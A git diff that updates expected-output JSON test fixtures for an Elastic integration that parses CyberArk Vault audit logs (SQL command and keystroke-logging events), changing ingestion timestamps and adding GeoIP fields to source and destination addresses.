\u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:57:05\",\"IsoTimestamp\":\"2021-03-25T14:57:05Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE 
UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -1173,7 +1173,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683141300Z", + "ingested": "2021-12-14T14:42:26.430589779Z", "original": "\u003c5\u003e1 2021-03-25T14:58:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=select distinct owner from all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:44\",\"IsoTimestamp\":\"2021-03-25T14:58:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=select distinct owner from 
all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event",
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json
index 28145839ab6..045f668a307 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json
@@ -85,7 +85,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165092Z", + "ingested": "2021-12-14T14:42:28.146626752Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating 
System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"361\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "361", "kind": "event", 
@@ -108,17 +108,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -201,7 +219,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165101100Z", + "ingested": "2021-12-14T14:42:28.146631066Z", "original": "\u003c5\u003e1 2021-03-14T13:49:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:49\",\"IsoTimestamp\":\"2021-03-14T13:49:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -224,17 +242,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -315,7 +351,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165104900Z", + "ingested": "2021-12-14T14:42:28.146631683Z", "original": "\u003c5\u003e1 2021-03-15T10:32:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:32:04\",\"IsoTimestamp\":\"2021-03-15T10:32:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\",\"Message\":\"Keystroke 
logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", @@ -338,17 +374,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
